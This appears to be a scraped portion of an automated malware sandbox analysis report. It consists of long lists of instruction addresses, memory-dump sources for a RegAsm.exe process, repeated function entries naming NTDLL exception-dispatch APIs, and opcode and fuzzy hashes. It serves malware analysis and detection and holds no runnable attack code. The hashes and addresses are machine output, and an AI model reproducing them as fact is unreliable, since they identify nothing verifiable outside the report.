                                                                          0x004013cc
                                                                          0x004013ce
                                                                          0x004013d8
                                                                          0x004013da
                                                                          0x004013dc
                                                                          0x004013de
                                                                          0x004013e0
                                                                          0x004013e2
                                                                          0x004013e5
                                                                          0x004013e9
                                                                          0x004013ef
                                                                          0x004013f0
                                                                          0x004013f9
                                                                          0x004013ff
                                                                          0x00401404
                                                                          0x00401405
                                                                          0x00401407
                                                                          0x00401409
                                                                          0x0040140b
                                                                          0x00401411
                                                                          0x00401415
                                                                          0x00401415
                                                                          0x0040141b
                                                                          0x00401492
                                                                          0x00401492
                                                                          0x00401493
                                                                          0x00401495
                                                                          0x0040149b
                                                                          0x0040149c
                                                                          0x0040149d
                                                                          0x004014a7
                                                                          0x004014a9
                                                                          0x004014ab
                                                                          0x004014b1
                                                                          0x004014b2
                                                                          0x004014b5
                                                                          0x00401520
                                                                          0x00401520
                                                                          0x0040152b
                                                                          0x0040152d
                                                                          0x0040152f
                                                                          0x00401530
                                                                          0x00401532
                                                                          0x00401535
                                                                          0x00401538
                                                                          0x004015a3
                                                                          0x004015a3
                                                                          0x004015a5
                                                                          0x004015a7
                                                                          0x004015a9
                                                                          0x004015aa
                                                                          0x004015af
                                                                          0x004015e2
                                                                          0x004015e5
                                                                          0x004015e6
                                                                          0x004015e8
                                                                          0x004015ea
                                                                          0x004015ec
                                                                          0x004015ee
                                                                          0x004015f0
                                                                          0x004015f2
                                                                          0x004015f3
                                                                          0x004015f3
                                                                          0x004015f4
                                                                          0x004015f4
                                                                          0x004015b1
                                                                          0x004015bb
                                                                          0x004015bd
                                                                          0x004015bf
                                                                          0x004015c1
                                                                          0x004015c3
                                                                          0x004015c5
                                                                          0x004015c7
                                                                          0x004015ca
                                                                          0x004015cb
                                                                          0x004015cb
                                                                          0x004015ce
                                                                          0x004015dc
                                                                          0x004015dd
                                                                          0x004015df
                                                                          0x004015e0
                                                                          0x004015e1
                                                                          0x00000000
                                                                          0x004015e1
                                                                          0x0040153a
                                                                          0x0040153b
                                                                          0x0040153c
                                                                          0x0040153e
                                                                          0x0040153f
                                                                          0x00401541
                                                                          0x00401544
                                                                          0x00401545
                                                                          0x00401546
                                                                          0x00401547
                                                                          0x00401548
                                                                          0x0040154e
                                                                          0x0040154e
                                                                          0x00401553
                                                                          0x00401554
                                                                          0x00401556
                                                                          0x00401558
                                                                          0x0040155a
                                                                          0x00401560
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00401562
                                                                          0x00401563
                                                                          0x00401564
                                                                          0x00401566
                                                                          0x00401567
                                                                          0x00401569
                                                                          0x0040156c
                                                                          0x00401573
                                                                          0x00401575
                                                                          0x00401579
                                                                          0x00401579
                                                                          0x0040157b
                                                                          0x0040157c
                                                                          0x0040157e
                                                                          0x00401582
                                                                          0x00401582
                                                                          0x00401584
                                                                          0x00401585
                                                                          0x00401585
                                                                          0x00401588
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040158a
                                                                          0x0040158b
                                                                          0x0040158c
                                                                          0x0040158c
                                                                          0x0040158e
                                                                          0x0040158f
                                                                          0x00401592
                                                                          0x00401593
                                                                          0x00401594
                                                                          0x00401595
                                                                          0x00401596
                                                                          0x004015a1
                                                                          0x00000000
                                                                          0x004015a1
                                                                          0x004014b7
                                                                          0x004014b8
                                                                          0x004014b9
                                                                          0x004014bc
                                                                          0x004014bf
                                                                          0x004014c0
                                                                          0x004014c4
                                                                          0x004014c5
                                                                          0x004014c6
                                                                          0x004014c7
                                                                          0x004014c9
                                                                          0x004014ca
                                                                          0x004014cb
                                                                          0x004014d1
                                                                          0x004014d6
                                                                          0x004014d8
                                                                          0x004014da
                                                                          0x004014dc
                                                                          0x004014de
                                                                          0x004014e0
                                                                          0x004014e0
                                                                          0x004014e3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004014e5
                                                                          0x004014e6
                                                                          0x004014e7
                                                                          0x004014ec
                                                                          0x004014ef
                                                                          0x004014f0
                                                                          0x004014f3
                                                                          0x004014f5
                                                                          0x004014f9
                                                                          0x004014fe
                                                                          0x004014ff
                                                                          0x00401501
                                                                          0x00401503
                                                                          0x00401503
                                                                          0x00401505
                                                                          0x00401507
                                                                          0x00401509
                                                                          0x0040150b
                                                                          0x0040150b
                                                                          0x0040150e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00401510
                                                                          0x00401511
                                                                          0x00401512
                                                                          0x00401514
                                                                          0x00401515
                                                                          0x00401517
                                                                          0x00401517
                                                                          0x00401517
                                                                          0x0040151a
                                                                          0x0040151b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040151d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040151f
                                                                          0x00000000
                                                                          0x0040151f
                                                                          0x0040141d
                                                                          0x0040141e
                                                                          0x0040148d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040148f
                                                                          0x00401490
                                                                          0x00401491
                                                                          0x00000000
                                                                          0x00401491
                                                                          0x00401420
                                                                          0x0040142b
                                                                          0x0040142c
                                                                          0x00401430
                                                                          0x00401432
                                                                          0x00401434
                                                                          0x00401435
                                                                          0x00401438
                                                                          0x0040143c
                                                                          0x00000000
                                                                          0x0040143c
                                                                          0x004012f9
                                                                          0x004012fa
                                                                          0x004012fc
                                                                          0x00401300
                                                                          0x00401301
                                                                          0x00401306
                                                                          0x00401308
                                                                          0x0040130d
                                                                          0x0040130f
                                                                          0x00401311
                                                                          0x00401316
                                                                          0x00401351
                                                                          0x00401351
                                                                          0x00401352
                                                                          0x00401355
                                                                          0x0040135c
                                                                          0x0040135e
                                                                          0x00401360
                                                                          0x00000000
                                                                          0x00401360
                                                                          0x00401318
                                                                          0x0040131a
                                                                          0x0040131c
                                                                          0x0040131e
                                                                          0x00401322
                                                                          0x00401324
                                                                          0x00401327
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00401329
                                                                          0x00401330
                                                                          0x00401331
                                                                          0x00401333
                                                                          0x00401335
                                                                          0x00401337
                                                                          0x00401337
                                                                          0x0040133a
                                                                          0x0040133c
                                                                          0x0040133d
                                                                          0x00401340
                                                                          0x00401344
                                                                          0x00401344
                                                                          0x0040134a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040134c
                                                                          0x0040134d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040134f
                                                                          0x00000000
                                                                          0x0040134f
                                                                          0x00401282
                                                                          0x004012ef
                                                                          0x004012f1
                                                                          0x004012f1
                                                                          0x004012f3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004012f3
                                                                          0x00401284
                                                                          0x00401288
                                                                          0x00401289
                                                                          0x0040128c
                                                                          0x0040128e
                                                                          0x00401290
                                                                          0x00401291
                                                                          0x00401293
                                                                          0x00401296
                                                                          0x00401296
                                                                          0x0040129a
                                                                          0x004012cd
                                                                          0x004012cd
                                                                          0x004012cf
                                                                          0x004012d1
                                                                          0x004012d2
                                                                          0x004012d5
                                                                          0x004012d6
                                                                          0x004012de
                                                                          0x004012e1
                                                                          0x004012e3
                                                                          0x004012e4
                                                                          0x004012e6
                                                                          0x004012e7
                                                                          0x004012e8
                                                                          0x004012e9
                                                                          0x004012ea
                                                                          0x004012eb
                                                                          0x004012ec
                                                                          0x00000000
                                                                          0x004012ec
                                                                          0x0040129c
                                                                          0x0040129e
                                                                          0x004012a0
                                                                          0x004012a5
                                                                          0x004012a7
                                                                          0x004012a9
                                                                          0x004012aa
                                                                          0x004012ad
                                                                          0x004012b1
                                                                          0x004012b2
                                                                          0x004012b4
                                                                          0x004012b5
                                                                          0x004012b7
                                                                          0x004012b9
                                                                          0x004012bb
                                                                          0x004012bb
                                                                          0x004012c0
                                                                          0x004012c0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004012c3
                                                                          0x004012c5
                                                                          0x004012c9
                                                                          0x004012cb
                                                                          0x00000000
                                                                          0x004012cb
                                                                          0x00401249
                                                                          0x0040124c
                                                                          0x0040124e
                                                                          0x00401251
                                                                          0x00401251
                                                                          0x00401252
                                                                          0x00401254
                                                                          0x00401255
                                                                          0x00401255
                                                                          0x00401258
                                                                          0x00401259
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040125b
                                                                          0x0040125e
                                                                          0x00401260
                                                                          0x00401262
                                                                          0x00401265
                                                                          0x00401267
                                                                          0x00401269
                                                                          0x00401269
                                                                          0x0040126d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00401271
                                                                          0x00401274
                                                                          0x00401277
                                                                          0x00000000
                                                                          0x00401277
                                                                          0x004011cc
                                                                          0x004011d7
                                                                          0x004011db
                                                                          0x004011e4
                                                                          0x004011e5
                                                                          0x004011e7
                                                                          0x004011e9
                                                                          0x004011ea
                                                                          0x004011ec
                                                                          0x004011ef
                                                                          0x004011f2
                                                                          0x004011f6
                                                                          0x004011f8
                                                                          0x004011f9
                                                                          0x004011fa
                                                                          0x004011fc
                                                                          0x00401203
                                                                          0x00401204
                                                                          0x00401206
                                                                          0x00401208
                                                                          0x0040120a
                                                                          0x0040120b
                                                                          0x0040120c
                                                                          0x0040120e
                                                                          0x0040120f
                                                                          0x00401212
                                                                          0x00401214
                                                                          0x00401217
                                                                          0x00401219
                                                                          0x0040121a
                                                                          0x0040121a
                                                                          0x0040121e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00401222
                                                                          0x00401225
                                                                          0x00401229
                                                                          0x0040122b
                                                                          0x0040122d
                                                                          0x0040122e
                                                                          0x00401231
                                                                          0x00401232
                                                                          0x00401233
                                                                          0x00401234
                                                                          0x00000000
                                                                          0x00401234
                                                                          0x00401136
                                                                          0x00401138
                                                                          0x00401139
                                                                          0x0040113e
                                                                          0x00401140
                                                                          0x00401142
                                                                          0x00401144
                                                                          0x00401146
                                                                          0x00401148
                                                                          0x0040114a
                                                                          0x0040114c
                                                                          0x0040114e
                                                                          0x0040114e
                                                                          0x00401150
                                                                          0x00401151
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00401153
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00401155
                                                                          0x00401156
                                                                          0x0040115e
                                                                          0x00401160
                                                                          0x00401162
                                                                          0x00401164
                                                                          0x00401166
                                                                          0x00401168
                                                                          0x0040116d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040116f
                                                                          0x00401171
                                                                          0x00401172
                                                                          0x00000000

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1068130492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1068126412.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1068143445.0000000000419000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1068148926.000000000041B000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: #100
                                                                          • String ID: VB5!6&*
                                                                          • API String ID: 1341478452-3593831657
                                                                          • Opcode ID: e0e613333062beea99acaf9f77939f1f473faffceb56c56fcad71a446f26f067
                                                                          • Instruction ID: 4cbb225949b0234324df1e2bac8d1a5ec9167fddb90c08cbb33dbf69bf38f13f
                                                                          • Opcode Fuzzy Hash: e0e613333062beea99acaf9f77939f1f473faffceb56c56fcad71a446f26f067
                                                                          • Instruction Fuzzy Hash: D222B97244E3C19FD7138B708DA65A23FB0EE1331471E06DBD8C18E1B3E2285A5AD766
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Analysis Process: RegAsm.exe PID: 6836 Parent PID: 5656 RegAsm.exeCOMMON

                                                                          Executed Functions

                                                                          Function 1D6A0A66, Relevance: 7.0, APIs: 4, Instructions: 964libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A1216
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: 1b527ea5ce5d2e71bbc276652587f952baa17afc6de6a647c781b784eb134244
                                                                          • Instruction ID: 167c717521c5f916f1ab0e1abfbc998bec30d0fdd8c44ef4138466802c7599f7
                                                                          • Opcode Fuzzy Hash: 1b527ea5ce5d2e71bbc276652587f952baa17afc6de6a647c781b784eb134244
                                                                          • Instruction Fuzzy Hash: 9AA22274A04228CFCB25DF34C8987ADB7B6BF89245F1081EAD649A3750CB359E86CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D73E948, Relevance: 1.9, APIs: 1, Instructions: 396COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741205104.000000001D730000.00000040.00000001.sdmp, Offset: 1D730000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d842bbeb0013ae28e5bf9d6e5bf145c5140bd5ecde86a96c861b0fb7f87e9b85
                                                                          • Instruction ID: b45b51479f09e44469331d335c82801762667bd6b9826ba7f9d05ca13a4b1ba5
                                                                          • Opcode Fuzzy Hash: d842bbeb0013ae28e5bf9d6e5bf145c5140bd5ecde86a96c861b0fb7f87e9b85
                                                                          • Instruction Fuzzy Hash: 83F15174A00219DFDB04CFA9C844BADBBF2FF44325F158669D509AF262DB70E945CB42
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A0A87, Relevance: 6.6, APIs: 4, Instructions: 637libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A1216
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: 0f107bee8eaa845872b87efe025517d75f9f4110af83fa9a6a89c3fc19ed4096
                                                                          • Instruction ID: 9627c43b7d97866c094f12d66e2e1b1fe7a332bc3c3100e7f5d58873b544db25
                                                                          • Opcode Fuzzy Hash: 0f107bee8eaa845872b87efe025517d75f9f4110af83fa9a6a89c3fc19ed4096
                                                                          • Instruction Fuzzy Hash: C9621474A04228CFCB26DF34C8987ADB7B6BF89245F1081EAD549A3350CB359E85CF52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A0ACE, Relevance: 6.6, APIs: 4, Instructions: 630libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A1216
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: 069bdbf1cb24f14a8a7c6cd05e45e9f802b717c3595f5df2ac3d158b631d57cf
                                                                          • Instruction ID: c919a87049fc49426b5a51c15ea85209d0043e965aab5134c2ea76e40f320b16
                                                                          • Opcode Fuzzy Hash: 069bdbf1cb24f14a8a7c6cd05e45e9f802b717c3595f5df2ac3d158b631d57cf
                                                                          • Instruction Fuzzy Hash: 7C521374A04228CFCB26DF74C8987ADB7B6BF89245F1081EAD549A3350CB359E85CF52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A0B15, Relevance: 6.6, APIs: 4, Instructions: 623libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A1216
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: b311900bdecf3eb775db86075d3d72595a2a5755a8cfea1e00b26ce130f18e92
                                                                          • Instruction ID: 05bfc80cefe33033a8762bdfb177e63121d16ded98341e6df83f49299c5e28f2
                                                                          • Opcode Fuzzy Hash: b311900bdecf3eb775db86075d3d72595a2a5755a8cfea1e00b26ce130f18e92
                                                                          • Instruction Fuzzy Hash: B2521474A04228CFCB26DF30C8987ADB7B6BF89245F1081EAD549A3350CB359E85CF52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A0B5C, Relevance: 6.6, APIs: 4, Instructions: 616libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A1216
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: 4d37ac186f2ace33c1f83e1464eb354e83eefce43c17d1a6408b2e4cd8234c16
                                                                          • Instruction ID: 75e07eff0bf5b70f95e3c835ee56ed8b520a1c20bc26438301833a176cfb7836
                                                                          • Opcode Fuzzy Hash: 4d37ac186f2ace33c1f83e1464eb354e83eefce43c17d1a6408b2e4cd8234c16
                                                                          • Instruction Fuzzy Hash: B1520474A04228CFCB26DF74C8987ADB7B6BF89245F1081EAD549A3350CB359E85CF52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A0BA3, Relevance: 6.6, APIs: 4, Instructions: 607libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A1216
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: 4b19c3ac552ec45c03af3935aad7f361919bfadd81ff22d872009386ee446c02
                                                                          • Instruction ID: 7088251da9ea516651e53bce8a7d000dfda7a9852ae1cfeae28a347fc8f15c7b
                                                                          • Opcode Fuzzy Hash: 4b19c3ac552ec45c03af3935aad7f361919bfadd81ff22d872009386ee446c02
                                                                          • Instruction Fuzzy Hash: 34521474A04228CFCB26DF74C8987ADB7B6BF89245F1081EAD549A3350CB359E85CF52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A0BE1, Relevance: 6.6, APIs: 4, Instructions: 600libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A1216
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: 592381ce25e87f398e959e9e7c4dbfc853b0c1b878254445cb631d185f73399a
                                                                          • Instruction ID: f32bf24fd77039bdfd548f480bf9d1f99d943422a9fc69484f85315f5d9d5374
                                                                          • Opcode Fuzzy Hash: 592381ce25e87f398e959e9e7c4dbfc853b0c1b878254445cb631d185f73399a
                                                                          • Instruction Fuzzy Hash: F3521574A04228CFCB26DF74C8987ADB7B6BF89245F1081EAD549A3350CB359E85CF52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A0C1F, Relevance: 6.6, APIs: 4, Instructions: 595libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A1216
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: b822cdddce9568e5f2133d00113a8ccc85b2a662b1ba3f8335b9e2ded9b0d35c
                                                                          • Instruction ID: 5f457ddfc53d1805d1b00be1489baad0ba24d3359ec992bd2c84b0beac2641eb
                                                                          • Opcode Fuzzy Hash: b822cdddce9568e5f2133d00113a8ccc85b2a662b1ba3f8335b9e2ded9b0d35c
                                                                          • Instruction Fuzzy Hash: B8521574A04228CFCB25DF74C8987ADB7B6BF89245F1081EAD549A3350CB359E86CF52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A0C66, Relevance: 6.6, APIs: 4, Instructions: 588libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A1216
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: 99cd9b8ace28a7238322b95e29f77f02b76c2099d594c00f99ba0893008a730c
                                                                          • Instruction ID: 9fcef344f81555977293072fd5cc3348b7cd839a37f7509ad35ce19acf9eb37c
                                                                          • Opcode Fuzzy Hash: 99cd9b8ace28a7238322b95e29f77f02b76c2099d594c00f99ba0893008a730c
                                                                          • Instruction Fuzzy Hash: EB521474A04228CFCB25DF74C8987ADB7B6BF89245F1081EAD549A3350CB359E86CF52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A0CAD, Relevance: 6.6, APIs: 4, Instructions: 579libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A1216
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: 9941a1ca03b38cea6bca1f6f1c93958000ac70d9b42c1010e17f8c438164beb0
                                                                          • Instruction ID: 996b14250d056c32e848aae679264c664a4f8d37fadc9e08b3cbe2d7fe824c00
                                                                          • Opcode Fuzzy Hash: 9941a1ca03b38cea6bca1f6f1c93958000ac70d9b42c1010e17f8c438164beb0
                                                                          • Instruction Fuzzy Hash: C2421474A04228CFCB25DF74C8987ADB7B6BF89245F1081EAD549A3350CB359E86CF52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A0CEB, Relevance: 6.6, APIs: 4, Instructions: 574libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A1216
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: 3c64e52ece9a081c569ac501be1a7a513a1459b6423398e5273bc50c65d25409
                                                                          • Instruction ID: fbe024695e684fd457d3be92fea61ca26e45fbee00b98c398ae776acaa2d60cc
                                                                          • Opcode Fuzzy Hash: 3c64e52ece9a081c569ac501be1a7a513a1459b6423398e5273bc50c65d25409
                                                                          • Instruction Fuzzy Hash: C3421374A04228CFCB25DF74C8987ADB7B6BF89245F1081EAD549A3340CB759E86CF52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A0D32, Relevance: 6.6, APIs: 4, Instructions: 567libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A1216
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: b569a414a7b7f0654beec2fdac784c58ae5decba734840c9163d6ebb4abbe6fc
                                                                          • Instruction ID: 6db472c5379350517673b0e79f1f49a79db64896e02d5857d78a78fe9948bf56
                                                                          • Opcode Fuzzy Hash: b569a414a7b7f0654beec2fdac784c58ae5decba734840c9163d6ebb4abbe6fc
                                                                          • Instruction Fuzzy Hash: B5421474A05228CFCB25DF74C8987ADB7B6BF89245F1081EAD549A3340CB359E86CF52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A0D79, Relevance: 6.6, APIs: 4, Instructions: 558libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A1216
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: ae3fabfe5e12cdd3181eb3ad206a69e80efe6dedec62d05c99890e1a3dba3d5b
                                                                          • Instruction ID: c56d1a2ff03b60ac2b48ec2b13ec3a2398e4c5cb1394e4d43d3b8fe6e462b832
                                                                          • Opcode Fuzzy Hash: ae3fabfe5e12cdd3181eb3ad206a69e80efe6dedec62d05c99890e1a3dba3d5b
                                                                          • Instruction Fuzzy Hash: 61421474A04228CFCB25DF74C8987ADB7B6BF89245F1081EAD549A3350CB359E86CF52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A0DB7, Relevance: 6.6, APIs: 4, Instructions: 553libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A1216
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
